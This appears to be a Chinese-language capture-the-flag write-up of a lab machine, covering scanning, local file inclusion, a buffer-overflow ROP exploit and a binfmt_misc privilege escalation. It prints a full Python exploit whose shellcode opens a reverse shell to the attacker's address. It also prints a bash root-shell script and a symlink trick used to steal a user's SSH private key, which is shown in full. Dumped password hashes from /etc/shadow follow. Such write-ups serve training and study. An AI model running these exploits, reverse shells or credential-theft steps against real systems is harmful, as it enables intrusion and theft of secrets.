基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.11.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 12:53 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.154
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
| 256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_ 256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open http nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.14 seconds

80

访问自动跳转首页,page参数加载页面,很可能存在LFI:

目录扫描

目录扫描可以发现一个beta.html,存在上传功能:

1
2
3
4
5
6
7
8
9
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.154/  -x html,php,txt

/assets (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/beta.html (Status: 200) [Size: 4144]
/css (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]
/default.html (Status: 200) [Size: 11414]
/index.php (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/index.php (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/js (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]

beta.html

upload

尝试上传文件,发现activate_license.php:

LFI

验证存在,会跳转到首页,所以通过repeater或者直接使用curl:

activate_license.php

LFI读前面的activate_license.php,发现本地1337端口的服务:

/proc/sched_debug

因为1337端口这是另一个进程,首先通过sched_debug获取进程信息:

/proc/pid/cmdline

然后根据pid再去获取其他信息,得到文件路径:

activate_license1337

下载下来分析,接下来就是二进制部分了

1
2
3
4
5
6
7
8
9
10
11
12
curl "http://10.10.11.154/index.php?page=/usr/bin/activate_license" --output activate_license

$ file activate_license
activate_license: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=554631debe5b40be0f96cabea315eedd2439fb81, for GNU/Linux 3.2.0, with debug_info, not stripped

checksec activate_license
[*] activate_license
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled

rop

基础rop,各种保护所需要的信息可以通过LFI去读maps获取,最终打到www-data:

1
offset 520

maps

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
559bc36a6000-559bc36a7000 r--p 00000000 08:01 2408                       /usr/bin/activate_license
559bc36a7000-559bc36a8000 r-xp 00001000 08:01 2408 /usr/bin/activate_license
559bc36a8000-559bc36a9000 r--p 00002000 08:01 2408 /usr/bin/activate_license
559bc36a9000-559bc36aa000 r--p 00002000 08:01 2408 /usr/bin/activate_license
559bc36aa000-559bc36ab000 rw-p 00003000 08:01 2408 /usr/bin/activate_license
559bc3ba7000-559bc3bc8000 rw-p 00000000 00:00 0 [heap]
7f68d48b9000-7f68d48bb000 rw-p 00000000 00:00 0
7f68d48bb000-7f68d48bc000 r--p 00000000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bc000-7f68d48be000 r-xp 00001000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48be000-7f68d48bf000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bf000-7f68d48c0000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c0000-7f68d48c1000 rw-p 00004000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c1000-7f68d48c8000 r--p 00000000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48c8000-7f68d48d8000 r-xp 00007000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48d8000-7f68d48dd000 r--p 00017000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48dd000-7f68d48de000 r--p 0001b000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48de000-7f68d48df000 rw-p 0001c000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48df000-7f68d48e3000 rw-p 00000000 00:00 0
7f68d48e3000-7f68d48f2000 r--p 00000000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d48f2000-7f68d498c000 r-xp 0000f000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d498c000-7f68d4a25000 r--p 000a9000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a25000-7f68d4a26000 r--p 00141000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a26000-7f68d4a27000 rw-p 00142000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a27000-7f68d4a4c000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4a4c000-7f68d4b97000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4b97000-7f68d4be1000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be1000-7f68d4be2000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be2000-7f68d4be5000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be5000-7f68d4be8000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be8000-7f68d4bec000 rw-p 00000000 00:00 0
7f68d4bec000-7f68d4bfc000 r--p 00000000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4bfc000-7f68d4cf4000 r-xp 00010000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4cf4000-7f68d4d28000 r--p 00108000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d28000-7f68d4d2c000 r--p 0013b000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2c000-7f68d4d2f000 rw-p 0013f000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2f000-7f68d4d31000 rw-p 00000000 00:00 0
7f68d4d36000-7f68d4d37000 r--p 00000000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d37000-7f68d4d57000 r-xp 00001000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d57000-7f68d4d5f000 r--p 00021000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d60000-7f68d4d61000 r--p 00029000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d61000-7f68d4d62000 rw-p 0002a000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d62000-7f68d4d63000 rw-p 00000000 00:00 0
7ffdd5ef5000-7ffdd5f16000 rw-p 00000000 00:00 0 [stack]
7ffdd5f4b000-7ffdd5f4f000 r--p 00000000 00:00 0 [vvar]
7ffdd5f4f000-7ffdd5f51000 r-xp 00000000 00:00 0 [vdso]

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python3
import requests
from pwn import *

def kill(sig, frame):
print("\n[\033[1;31m-\033[1;37m] Saliendo\n")
sys.exit(1)

signal.signal(signal.SIGINT, kill)

inip = input("\n[\033[1;34m*\033[1;37m] Introduce tu ip (tun0): ")
inport = ("443")

def file(path):
request = requests.get(f"http://10.10.11.154/index.php?page={path}", allow_redirects=False)
rpath = f"/tmp/{path.split('/')[-1]}"
with open(rpath,"wb") as f:
f.write(request.content)
return rpath

def rpid():
request = requests.get(f"http://10.10.11.154/index.php?page=/proc/sched_debug", allow_redirects=False)
pid = re.search("activate_licens\s+([0-9]+)",request.text).group(1)
return pid

def adrs(pid):
r = requests.get(f"http://10.10.11.154/index.php?page=/proc/{pid}/maps", allow_redirects=False)
libcb = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16)
libcp = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1]
libsb = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16)
libsp = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1]
sbase = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16)
ssend = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16)
return libcb, libcp,libsb, libsp, sbase, ssend

def bof():
ip = socket.inet_aton(inip)
port = port=struct.pack(">H",int(inport))

payload = b""
payload += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
payload += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48"
payload += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
payload += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
payload += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
payload += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"

pid = rpid()

libcb, libcp, libsb, libsp, sbase, ssend = adrs(pid)

ssize = ssend - sbase

context.clear(arch='amd64')
libc = ELF(file(libcp),checksec=False)
libc.address = libcb
libsql = ELF(file(libsp),checksec=False)
libsql.address = libsb
rop = ROP([libc, libsql])

offset = 520

prt = libc.symbols['mprotect']
rdi = rop.rdi[0]
rsi = rop.rsi[0]
rdx = rop.rdx[0]
rsp = rop.jmp_rsp[0]

exploit = b'A' * offset

exploit += p64(rdi) + p64(sbase)
exploit += p64(rsi) + p64(ssize)
exploit += p64(rdx) + p64(7)
exploit += p64(prt)
exploit += p64(rsp)
exploit += payload

requests.post(f"http://10.10.11.154/activate_license.php", files = { "licensefile": exploit } )

threading.Thread(target=bof, args=()).start()
shell = listen(443, timeout=60).wait_for_connection()
shell.sendline(b"export TERM=xterm HOME=/var/www")
shell.interactive()

website_backup

枚举可以发现一个website_backup定时运行,其中调用的是/usr/bin/webbackup:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
systemctl list-timers

Thu 2022-06-23 05:24:00 UTC 31s left Thu 2022-06-23 05:23:09 UTC 19s ago website_backup.timer website_backup.service

$ find / -name website_backup.service 2>/dev/null
/etc/systemd/system/website_backup.service

$ cat /etc/systemd/system/website_backup.service
[Unit]
Description=Backup and rotate website

[Service]
User=dev
Group=www-data
ExecStart=/usr/bin/webbackup

[Install]
WantedBy=multi-user.target

/usr/bin/webbackup

继续检查这个,发现其中调用zip,我们可以考虑使用软链接让它压缩我们想要获取的文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cat /usr/bin/webbackup
#!/bin/bash
set -euf -o pipefail

cd /var/www/

SRC=/var/www/html
DST="/var/www/$(date +%Y-%m-%d_%H-%M-%S)-html.zip"

/usr/bin/rm --force -- "$DST"
/usr/bin/zip --recurse-paths "$DST" "$SRC"

KEEP=10
/usr/bin/find /var/www/ -maxdepth 1 -name '*.zip' -print0 \
| sort --zero-terminated --numeric-sort --reverse \
| while IFS= read -r -d '' backup; do
if [ "$KEEP" -le 0 ]; then
/usr/bin/rm --force -- "$backup"
fi
KEEP="$((KEEP-1))"
done

软链接

所以就是创建一个软链接,等待执行后去解压生成的zip文件,获取对应文件

1
2
3
4
5
6
7
8
$ cd /var/www/html
$ ln -s /home/dev/.ssh/id_rsa id_rsa

$ cp /var/www/2022-06-23_05-50-09-html.zip /tmp
$ cd /tmp
$ unzip 2022-06-23_05-50-09-html.zip

$ cat var/www/html/id_rsa

dev_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA58qqrW05/urHKCqCgcIPhGka60Y+nQcngHS6IvG44gcb3w0HN/yf
db6Nzw5wfLeLD4uDt8k9M7RPgkdnIRwdNFxleNHuHWmK0j7OOQ0rUsrs8LudOdkHGu0qQr
AnCIpK3Gb74zh6pe03zHVcZyLR2tXWmoXqRF8gE2hsry/AECZRSfaYRhac6lASRZD74bQb
xOeSuNyMfCsbJ/xKvlupiMKcbD+7RHysCSM6xkgBoJ+rraSpYTiXs/vihkp6pN2jMRa/ee
ADRNWoyqU7LVsKwhZ//AxKjJSvDSnaUeIDaKZ6e4XYsOKTXX3Trh7u9Bjv2YFD8DRDEmDI
5d+t6Imws8370a/5Z2z7C7jfCpzDATek0NIqLi3jEmI/8vLO9xIckjaNVoqw/BVKNqjd03
KKK2Y0c5DRArFmwkJdmbGxwzyTV8oQZdjw0mVBFjbdQ0iiQBEFGNP9/zpT//ewaosZYROE
4FHXNEIq23Z3SxUNyUeLqkI8Mlf0McBmvc/ozGR5AAAFgKXd9Tyl3fU8AAAAB3NzaC1yc2
EAAAGBAOfKqq1tOf7qxygqgoHCD4RpGutGPp0HJ4B0uiLxuOIHG98NBzf8n3W+jc8OcHy3
iw+Lg7fJPTO0T4JHZyEcHTRcZXjR7h1pitI+zjkNK1LK7PC7nTnZBxrtKkKwJwiKStxm++
M4eqXtN8x1XGci0drV1pqF6kRfIBNobK8vwBAmUUn2mEYWnOpQEkWQ++G0G8TnkrjcjHwr
Gyf8Sr5bqYjCnGw/u0R8rAkjOsZIAaCfq62kqWE4l7P74oZKeqTdozEWv3ngA0TVqMqlOy
1bCsIWf/wMSoyUrw0p2lHiA2imenuF2LDik119064e7vQY79mBQ/A0QxJgyOXfreiJsLPN
+9Gv+Wds+wu43wqcwwE3pNDSKi4t4xJiP/LyzvcSHJI2jVaKsPwVSjao3dNyiitmNHOQ0Q
KxZsJCXZmxscM8k1fKEGXY8NJlQRY23UNIokARBRjT/f86U//3sGqLGWEThOBR1zRCKtt2
d0sVDclHi6pCPDJX9DHAZr3P6MxkeQAAAAMBAAEAAAGAEOqioDubgvZBiLXphmzSUxiUpV
0gDrfJ8z8RoqE/nAdmylWaFET0olRA5z6niQKgPIczGsOuGsrrDpgFd84kd4DSywmPNkhQ
oF2DEXjbk5RJzJv0spcbRKTQc8OFZcMqCYHemkux79ArRVm/X6uT40O+ANMLMOg8YA47+G
EkxEj3n81Geb8GvrcPTlJxf5x0dl9sPt+hxSIkPjvUfKYV7mw9nEzebvYmXBhdHsF8lOty
TR76WaUWtUUJ2EExSD0Am3DQMq4sgLT9tb+rlU7DoHtoSPX6CfdInH9ciRnLG1kVbDaEaa
NT2anONVOswKJWVYgUN83cCCPyRzQJLPC6u7uSdhXU9sGuN34m5wQYp3wFiRnIdKgTcnI8
IoVRX0rnTtBUWeiduhdi2XbYh5OFFjh77tWCi9eTR7wopwUGR0u5sbDZYGPlOWNk22+Ncw
qQMIq0f4TBegkOUNV85gyEkIwifjgvfdw5FJ4zhoVbbevgo7IVz3gIYfDjktTF+n9dAAAA
wDyIzLbm4JWNgNhrc7Ey8wnDEUAQFrtdWMS/UyZY8lpwj0uVw8wdXiV8rFFPZezpyio9nr
xybImQU+QgCBdqQSavk4OJetk29fk7X7TWmKw5dwLuEDbJZo8X/MozmhgOR9nhMrBXR2g/
yJuCfKA0rcKby+3TSbl/uCk8hIPUDT+BNYyR5yBggI7+DKQBvHa8eTdvqGRnJ9jUnP6tfB
KCKW97HIfCpt5tzoKiJ7/eAuGEjjHN28GP1u4iVoD0udnUHQAAAMEA+RceJG5scCzciPd9
7zsHHTpQNhKQs13qfgQ9UGbyCit+eWzc/bplfm5ljfw+cFntZULdkhiFCIosHPLxmYe8r0
FZUzTqOeDCVK9AZjn8uy8VaFCWb4jvB+oZ3d+pjFKXIVWpl0ulnpOOoHHIoM7ghudXb0vF
L8+QpuPCuHrb2N9JVLxHrTyZh3+v9Pg/R6Za5RCCT36R+W6es8Exoc9itANuoLudiUtZif
84JIKNaGGi6HGdAqHaxBmEn7N/XDu7AAAAwQDuOLR38jHklS+pmYsXyLjOSPUlZI7EAGlC
xW5PH/X1MNBfBDyB+7qjFFx0tTsfVRboJvhiYtRbg/NgfBpnNH8LpswL0agdZyGw3Np4w8
aQSXt9vNnIW2hDwX9fIFGKaz58FYweCXzLwgRVGBfnpq2QSXB0iXtLCNkWbAS9DM3esjsA
1JCCYKFMrvXeeshyxnKmXix+3qeoh8TTQvr7ZathE5BQrYXvfRwZJQcgh8yv71pNT3Gpia
7rTyG3wbNka1sAAAALZGV2QHJldGlyZWQ=
-----END OPENSSH PRIVATE KEY-----

user flag

使用得到的私钥登录dev用户:

emuemu

emuemu目录里两个二进制文件,提供有源码:

reg_helper发现binfmt_misc相关:

搜索可以发现实际使用的lib目录下的reg_helper,和当前目录的一致:

也可以发现binfmt_misc相关利用:

提权 & root flag

上面的脚本修改一些代码为当前环境信息,运行,root

  • 删除not_writeable因为我们没有对应的写权限
  • 最终的echo那里使用对应文件
1
2
echo "$binfmt_line" > "$mountpoint"/register
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

exp.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/bin/bash

readonly searchsuid="/bin/"
readonly mountpoint="/proc/sys/fs/binfmt_misc"
readonly exe="$0"


warn()
{
1>&2 echo $@
}

die()
{
warn $@
exit -1
}

usage()
{
cat 1>&2 <<EOF
Usage: $exe
Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
note that it must be enforced by any other mean before your try this, for
example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
thinking that you are fixing his problem.
EOF
exit 1
}

function pick_suid()
{
find "$1" -perm -4000 -executable \
| tail -n 1
}

function read_magic()
{
[[ -e "$1" ]] && \
[[ "$2" =~ [[:digit:]]+ ]] && \
dd if="$1" bs=1 count="$2" status=none \
| sed -e 's-\x00-\\x00-g'
}

[[ -n "$1" ]] && usage

target="$(pick_suid "$searchsuid")"
test -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"

binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"

fmtname="$(mktemp -u XXXX)"
fmtinterpr="$(mktemp)"

gcc -o "$fmtinterpr" -xc - <<- __EOF__
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <pwd.h>

int main(int argc, char *argv[])
{
// remove our temporary file
unlink("$fmtinterpr");

// remove the unused binary format
FILE* fmt = fopen("$mountpoint/$fmtname", "w");
fprintf(fmt, "-1\\n");
fclose(fmt);

// MOTD
setuid(0);
uid_t uid = getuid();
uid_t euid = geteuid();
struct passwd *pw = getpwuid(uid);
struct passwd *epw = getpwuid(euid);
fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
uid,
pw->pw_name,
euid,
epw->pw_name);

// welcome home
char* sh[] = {"/bin/sh", (char*) 0};
execvp(sh[0], sh);
return 1;
}
__EOF__

chmod a+x "$fmtinterpr"

binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

exec "$target"

shadow

1
2
root:$y$j9T$WTPWClbhbDs7l.UxQ36u80$ARJoOe6zhfOEca5WFBXjo4fGaxCg1Iof6qTbrfn1CzA:19062:0:99999:7:::
dev:$6$kxjJ4ZicR62IY8ot$YKNoHWo9jQdRnNQ2f9dKX4IUI70ocRkClcIjUfoI/RF0.q6UeWLf2Jb8AfNyBHjJPxS0o5a7MhBR9g.eNfu8/.:18913:0:99999:7:::

参考资料